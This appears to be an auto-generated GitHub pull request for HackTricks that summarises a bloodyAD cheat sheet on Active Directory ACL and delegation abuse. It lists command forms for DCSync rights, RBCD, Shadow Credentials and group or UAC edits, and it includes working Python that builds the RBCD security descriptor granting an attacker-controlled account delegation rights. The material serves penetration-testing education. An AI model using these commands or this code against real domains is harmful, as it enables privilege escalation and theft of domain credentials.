@carlospolop
Collaborator

🤖 Automated Content Update

This PR was automatically generated by the HackTricks News Bot based on a technical blog post.

📝 Source Information

🎯 Content Summary

What it is
bloodyAD is a command‑line “AD Privesc Swiss Army Knife” for manipulating Active Directory objects and ACLs to enable common attack paths (e.g., DCSync, RBCD, Shadow Credentials), plus discovery helpers (BloodHound CE collector, writable objects, trusts, DNS). It authenticates over NTLM, Kerberos (TGT/password/keyfiles), PKINIT, or Schannel, and speaks LDAP/GC with optional TLS.

Executable entry point

$ bloodyAD -h

usage: bloodyAD [-h] [-d DO...

🔧 Technical Details

DCSync right assignment
Abuse domain object ACLs to add replication rights for an attacker‑controlled principal. Once granted, that principal can replicate directory secrets (NTDS credential material) via DRSUAPI, leading to full domain compromise. Command: bloodyAD add dcsync <trustee>.

Resource‑Based Constrained Delegation (RBCD)
On a target computer/service object, set msDS-AllowedToActOnBehalfOfOtherIdentity to an attacker‑controlled service account, enabling S4U2Proxy/S4U2Self‑based impersonation to the target. Command: bloodyAD add rbcd <target> <service>. Requires write permissions on that attribute and Windows Server ≥ 2012.

Shadow Credentials (KeyCredentialLink)
Write an attacker public key into msDS-KeyCredentialLink for a target account, then use PKINIT to obtain a TGT and derive the NT hash—bypassing password/RC4 requirements. Command: bloodyAD add sha...

🤖 Agent Actions

Made a concise but comprehensive bloodyAD cheat sheet focused on ACL/Delegation abuse and related AD operations.

What I updated

  • File: src/windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md
  • Added a new section “bloodyAD — AD ACL/Delegation abuse from Linux (cheat sheet)” with:
    • Auth/transport flags (-d, -u, -p, -k with ccache/kirbi/keytab, -c for Schannel/PKINIT, -s for LDAPS, -ss debugging only)
    • Offensive primitives:
      • DCSync right assignment: add dcsync
      • RBCD: add rbcd and notes for using getST/Rubeus post-write
      • Shadow Credentials: add shadowCredentials with preconditions (2016+ DC schema, PKINIT/ADCS)
      • GenericAll: add genericAll
      • Group membership: add groupMember (foreign users supported)
      • UAC flagging: add uac (DONT_REQ_PREAUTH, DONT_EXPIRE_PASSWORD, etc.)
      • Account creation: add user / add computer with dNSHostName constraint note (need FQDN in -d)
      • badSuccessor: add badSuccessor DMSA setup for migration/persistence
    • AD-integrated DNS manipulation:
      • add dnsRecord with dnstype/ttl/priority/weight and a practical example
    • Discovery helpers:
      • get bloodhound, trusts, writable, dnsDump, membership, object/search usage examples
    • Operational notes (LDAPS recommended, Kerberos-only with ccache, --json and -v TRACE)

References

Reasoning

  • This page already aggregates AD ACL/ACE abuse techniques and even referenced bloodyAD in places, so centralizing a practical, technical bloodyAD workflow here helps chain DCSync, RBCD, Shadow Credentials, group/UAC edits, and ADIDNS manipulation in one place.
  • Avoided creating a new tool page to keep content close to the ACL/Delegation abuse tactics where operators will use it.
  • Preserved existing content and format, used clear command examples and minimal notes for preconditions and pitfalls.

No other files were modified.


This PR was automatically created by the HackTricks Feed Bot. Please review the changes carefully before merging.

📚 Repository Maintenance

  • MD files processed: 907
  • MD files fixed: 1

All .md files have been checked for proper formatting (headers, includes, etc.).
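Added example (not bloodyAD's own code, and not part of the PR) showing what the `add rbcd <target> <service>` primitive listed above actually writes: a self-relative security descriptor stored in msDS-AllowedToActOnBehalfOfOtherIdentity whose DACL holds an ACCESS_ALLOWED ACE for the attacker-controlled service account's SID. The owner/group of BUILTIN\Administrators (S-1-5-32-544), the ACL revision 4 and the 0xF01FF access mask follow the convention impacket's rbcd.py uses; the 21-xxx domain SIDs are constructed test values. It also handles the edge case the cheat sheet's notes do not spell out: adding a second service without clobbering a delegation already configured on the target.

```python
import struct

# Mask impacket's rbcd.py writes for the allow ACE (983551 == 0xF01FF, full control).
RBCD_ACE_MASK = 0x000F01FF
ADMINISTRATORS_SID = "S-1-5-32-544"       # owner/group used for the descriptor
SE_DACL_PRESENT, SE_SELF_RELATIVE = 0x0004, 0x8000
ACCESS_ALLOWED_ACE_TYPE, ACL_REVISION_DS = 0x00, 4


def sid_to_bytes(sid: str) -> bytes:
    """Encode 'S-1-5-21-...' into the binary SID layout (revision, count,
    6-byte big-endian authority, little-endian sub-authorities)."""
    parts = sid.split("-")
    if parts[0] != "S" or len(parts) < 3:
        raise ValueError(f"not a SID: {sid}")
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(x) for x in parts[3:]]
    if len(subs) > 15:
        raise ValueError("too many sub-authorities")
    out = struct.pack("<BB", revision, len(subs)) + authority.to_bytes(6, "big")
    return out + b"".join(struct.pack("<I", s) for s in subs)


def bytes_to_sid(data: bytes, offset: int = 0):
    """Decode a binary SID at offset; returns (sid_string, bytes_consumed)."""
    revision, count = struct.unpack_from("<BB", data, offset)
    authority = int.from_bytes(data[offset + 2:offset + 8], "big")
    subs = struct.unpack_from("<" + "I" * count, data, offset + 8)
    return "S-%d-%d" % (revision, authority) + "".join("-%d" % s for s in subs), 8 + 4 * count


def build_rbcd_sd(service_sids) -> bytes:
    """Build the self-relative SECURITY_DESCRIPTOR for
    msDS-AllowedToActOnBehalfOfOtherIdentity: one allow ACE per service SID."""
    aces = b""
    for sid in service_sids:
        sid_b = sid_to_bytes(sid)
        # ACE header: type, flags, size, mask, then the trustee SID
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid_b), RBCD_ACE_MASK) + sid_b
    # ACL header: revision, sbz1, size, ace count, sbz2
    dacl = struct.pack("<BBHHH", ACL_REVISION_DS, 0, 8 + len(aces), len(service_sids), 0) + aces
    owner = group = sid_to_bytes(ADMINISTRATORS_SID)
    off_owner = 20                          # SD header is 20 bytes
    off_group = off_owner + len(owner)
    off_dacl = off_group + len(group)
    header = struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE,
                         off_owner, off_group, 0, off_dacl)   # no SACL
    return header + owner + group + dacl


def parse_rbcd_sd(sd: bytes):
    """Walk the DACL of a descriptor read back from the attribute and return
    [(sid, mask), ...] for every ACCESS_ALLOWED ACE, i.e. who may delegate."""
    revision, _, control, _, _, _, off_dacl = struct.unpack_from("<BBHIIII", sd, 0)
    if revision != 1 or not (control & SE_DACL_PRESENT):
        raise ValueError("descriptor has no DACL")
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", sd, off_dacl)
    pos, allowed = off_dacl + 8, []
    for _ in range(ace_count):
        ace_type, _, ace_size, mask = struct.unpack_from("<BBHI", sd, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            allowed.append((bytes_to_sid(sd, pos + 8)[0], mask))
        pos += ace_size                      # skip unknown ACE types by size
    return allowed


def add_service_to_sd(existing, service_sid: str) -> bytes:
    """Append service_sid to an existing descriptor (or start a new one when the
    attribute is empty) without dropping delegations already on the target."""
    current = [sid for sid, _ in parse_rbcd_sd(existing)] if existing else []
    if service_sid not in current:
        current.append(service_sid)
    return build_rbcd_sd(current)


if __name__ == "__main__":
    # Constructed SIDs: an attacker-owned computer account, then a second one.
    sd = build_rbcd_sd(["S-1-5-21-1-2-3-1105"])
    print(len(sd), "bytes:", sd.hex())
    sd = add_service_to_sd(sd, "S-1-5-21-1-2-3-1106")
    print(parse_rbcd_sd(sd))
```

The raw attribute value read back from the target computer object (for instance with the `get object` helper the cheat sheet lists) can be passed to `parse_rbcd_sd` to confirm exactly which SIDs are now allowed to delegate before moving on to getST/Rubeus, and to check that no pre-existing entry was silently overwritten.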

@carlospolop
Collaborator Author

🔗 Additional Context

Original Blog Post: https://github.com/CravateRouge/bloodyAD/wiki/User-Guide

Content Categories: Based on the analysis, this content was categorized under "Windows / Active Directory -> ACL/Delegation Abuse (DCSync, RBCD, Shadow Credentials) and Tools (bloodyAD)".

Repository Maintenance:

  • MD Files Formatting: 907 files processed (1 file fixed)

Review Notes:

  • This content was automatically processed and may require human review for accuracy
  • Check that the placement within the repository structure is appropriate
  • Verify that all technical details are correct and up-to-date
  • All .md files have been checked for proper formatting (headers, includes, etc.)

Bot Version: HackTricks News Bot v1.0
